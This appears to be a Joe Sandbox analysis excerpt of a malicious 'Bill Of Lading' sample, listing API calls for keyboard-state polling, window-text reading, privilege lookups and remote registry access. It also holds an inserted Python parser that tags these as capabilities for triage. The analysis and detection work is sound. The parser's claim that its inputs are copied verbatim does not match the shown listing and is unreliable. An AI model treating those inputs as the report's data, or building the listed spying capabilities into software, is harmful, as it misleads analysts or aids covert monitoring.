• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
• Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
• Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
• Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
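Added example, not part of the Joe Sandbox report or of the analysed sample: a small Python parser for the per-function "APIs" listings in the form shown above. It turns each bullet into a record (API, module, arguments, reference address, subcall parent), decodes the virtual-key codes polled by the GetAsyncKeyState/GetKeyState function above (0xA0/0xA1 shift, 0x11 control, 0x12 alt, 0x5B left Windows key, values from winuser.h) and tags a function with a capability label when enough of a rule's APIs appear, so the keyboard-state polling here and the WSAStartup/gethostname/gethostbyname/inet_ntoa sequence earlier can be triaged mechanically. The line pattern, the capability labels and the per-rule thresholds are my assumptions; the two sample inputs are copied verbatim from the listings above.

```python
"""Parse Joe Sandbox per-function API listings and tag each function with a capability.

Added example, not part of the Joe Sandbox report or of the sample. Line format,
capability labels and thresholds are assumptions based on the listings on this page.
"""
import re

# One bullet of the report's "APIs" list, e.g.
#   • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
#   • WSACleanup.WSOCK32 ref: 004365FD                      (no argument list)
#   • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?), ref: 0041178B
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)

# Virtual-key codes seen in the GetAsyncKeyState/GetKeyState arguments (winuser.h values).
VK_NAMES = {
    0x11: "VK_CONTROL",
    0x12: "VK_MENU",  # Alt
    0x5B: "VK_LWIN",
    0xA0: "VK_LSHIFT",
    0xA1: "VK_RSHIFT",
}

# (label, API names, minimum number of distinct names that must appear) -- assumed rules
CAPABILITY_RULES = [
    ("keyboard-state polling", {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState"}, 2),
    ("local host IP discovery", {"gethostname", "gethostbyname", "inet_ntoa"}, 2),
    ("window title/class harvesting", {"GetClassNameW", "GetWindowTextW"}, 1),
    ("remote registry access", {"RegConnectRegistryW"}, 1),
]

# Constructed sample inputs: the two API listings copied from this report.
SAMPLE_KEYBOARD = """\
• GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
• SetKeyboardState.USER32(?), ref: 00453C5A
• GetAsyncKeyState.USER32(000000A0), ref: 00453C82
• GetKeyState.USER32(000000A0), ref: 00453C99
• GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
• GetKeyState.USER32(000000A1), ref: 00453CDA
• GetAsyncKeyState.USER32(00000011), ref: 00453D07
• GetKeyState.USER32(00000011), ref: 00453D15
• GetAsyncKeyState.USER32(00000012), ref: 00453D3F
• GetKeyState.USER32(00000012), ref: 00453D4D
• GetAsyncKeyState.USER32(0000005B), ref: 00453D77
• GetKeyState.USER32(0000005B), ref: 00453D85
"""

SAMPLE_WSA = """\
• WSAStartup.WSOCK32(00000101,?), ref: 004365A5
• gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
• gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
• _wcscpy.LIBCMT ref: 004365F5
• WSACleanup.WSOCK32 ref: 004365FD
• inet_ntoa.WSOCK32(00000100,?), ref: 00436624
  • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
"""


def parse_trace(text):
    """Return one dict per API bullet: api, module, args (list of str), ref, subcall."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headers such as "APIs"/"Strings" and non-bullet lines
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": m.group("ref"),
            "subcall": m.group("subcall"),
        })
    return calls


def polled_keys(calls):
    """Sorted virtual-key names passed as first argument to GetAsyncKeyState/GetKeyState."""
    names = set()
    for c in calls:
        if c["api"] in ("GetAsyncKeyState", "GetKeyState") and c["args"]:
            arg = c["args"][0]
            if re.fullmatch(r"[0-9A-Fa-f]+", arg):  # skip unresolved "?" arguments
                vk = int(arg, 16)
                names.add(VK_NAMES.get(vk, f"VK_0x{vk:02X}"))
    return sorted(names)


def classify(calls):
    """Capability labels whose API set is covered by at least the rule's threshold."""
    seen = {c["api"] for c in calls}
    return [label for label, apis, need in CAPABILITY_RULES if len(seen & apis) >= need]


if __name__ == "__main__":
    for name, sample in (("keyboard", SAMPLE_KEYBOARD), ("wsa", SAMPLE_WSA)):
        calls = parse_trace(sample)
        print(name, len(calls), "calls", classify(calls), polled_keys(calls))
```

The threshold per rule matters: a single GetKeyState call is common in benign UI code, whereas polling GetAsyncKeyState and GetKeyState for every modifier key in one function, as this sample does, is the pattern worth flagging; tune the thresholds to the capability you are hunting for.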
APIs
• GetDlgItem.USER32(?,00000001), ref: 00437DD7
• GetWindowRect.USER32(00000000,?), ref: 00437DE9
• MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
• GetDlgItem.USER32(?,00000002), ref: 00437E70
• GetWindowRect.USER32(00000000,?), ref: 00437E82
• MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
• GetDlgItem.USER32(?,000003E9), ref: 00437EEA
• GetWindowRect.USER32(00000000,?), ref: 00437EFC
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
• GetDlgItem.USER32(?,000003EA), ref: 00437F55
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
• InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
• Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
• Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
• Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
APIs
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• String ID:
• API String ID: 136442275-0
• Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
• Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
• Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
• Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: ConnectRegistry_wcslen
• String ID: HH
• API String ID: 535477410-2761332787
• Opcode ID: e91c6bd909ad74ed1928ed0244ed8aa8a8dc52ba60fb0b240039b69f8a910896
• Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
• Opcode Fuzzy Hash: e91c6bd909ad74ed1928ed0244ed8aa8a8dc52ba60fb0b240039b69f8a910896
• Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                                                                      • _wcslen.LIBCMT ref: 00460502
                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                                                                      • String ID: ThumbnailClass
                                                                                                                      • API String ID: 4123061591-1241985126
                                                                                                                      • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                      • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                                                                      • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                      • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                        • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                        • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                        • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                      • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                                                                      • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                                                                      • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                                                                      • ReleaseCapture.USER32 ref: 0046F589
                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                                                                      • API String ID: 2483343779-2060113733
                                                                                                                      • Opcode ID: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                                                                      • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                                                                      • Opcode Fuzzy Hash: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                                                                      • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                                                                      APIs
                                                                                                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                                                                      • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                                                                      • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                                                                      • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                                                                      • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                      • String ID: 2
                                                                                                                      • API String ID: 1331449709-450215437
                                                                                                                      • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                      • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                                                                      • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                      • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,00000000,static,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 00450EE1
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: DestroyWindow
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 3375834691-2160076837
                                                                                                                      • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                                                                      • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                                                                                                                      • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                                                                      • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                                                                      • _memcmp.LIBCMT ref: 004394A9
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                                                                      Strings
                                                                                                                      • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                                                                      • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                                                                      • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                                                      • API String ID: 1446985595-805462909
                                                                                                                      • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                      • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                                                                      • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                      • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                                                                      • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                      • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                                                                      • API String ID: 2907320926-41864084
                                                                                                                      • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
• Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
• Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
• Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
APIs
• SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
• SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
• SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
• SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
• SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
• SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
• SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
• SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
• SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
• SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID:
• API String ID: 1932665248-0
• Opcode ID: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
• Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
• Opcode Fuzzy Hash: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
• Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
• GetWindowLongW.USER32(?,000000F0), ref: 004481A7
• _memset.LIBCMT ref: 004481BA
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
• SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
• SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
• SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
• SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
• Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
• Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
• Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
APIs
  • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
• DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
• ImageList_Destroy.COMCTL32(?), ref: 0046EB04
• ImageList_Destroy.COMCTL32(?), ref: 0046EB18
• ImageList_Destroy.COMCTL32(?), ref: 0046EB24
• DeleteObject.GDI32(003D0000), ref: 0046EB4F
• DestroyIcon.USER32(006F0043), ref: 0046EB67
• DeleteObject.GDI32(17690002), ref: 0046EB7F
• DestroyWindow.USER32(00450053), ref: 0046EB97
• DestroyIcon.USER32(?), ref: 0046EBBF
• DestroyIcon.USER32(?), ref: 0046EBCD
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
• String ID:
• API String ID: 802431696-0
• Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
• Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
• Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
• Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
APIs
• GetKeyboardState.USER32(?,?,?), ref: 00444D8A
• GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
• GetKeyState.USER32(000000A0), ref: 00444E26
• GetAsyncKeyState.USER32(000000A1), ref: 00444E40
• GetKeyState.USER32(000000A1), ref: 00444E51
• GetAsyncKeyState.USER32(00000011), ref: 00444E69
• GetKeyState.USER32(00000011), ref: 00444E77
• GetAsyncKeyState.USER32(00000012), ref: 00444E8F
• GetKeyState.USER32(00000012), ref: 00444E9D
• GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
• GetKeyState.USER32(0000005B), ref: 00444EC3
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
• Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
• Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
• Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
• SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
• _wcslen.LIBCMT ref: 00450944
• _wcscat.LIBCMT ref: 00450955
• SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
• SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: MessageSend$Window_wcscat_wcslen
• String ID: -----$SysListView32
• API String ID: 4008455318-3975388722
• Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
• Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
• Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
• Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
APIs
• _memset.LIBCMT ref: 00448625
• CreateMenu.USER32 ref: 0044863C
• SetMenu.USER32(?,00000000), ref: 0044864C
• GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
• IsMenu.USER32(?), ref: 004486EB
• CreatePopupMenu.USER32 ref: 004486F5
• InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
• DrawMenuBar.USER32 ref: 00448742
Strings
Memory Dump Source
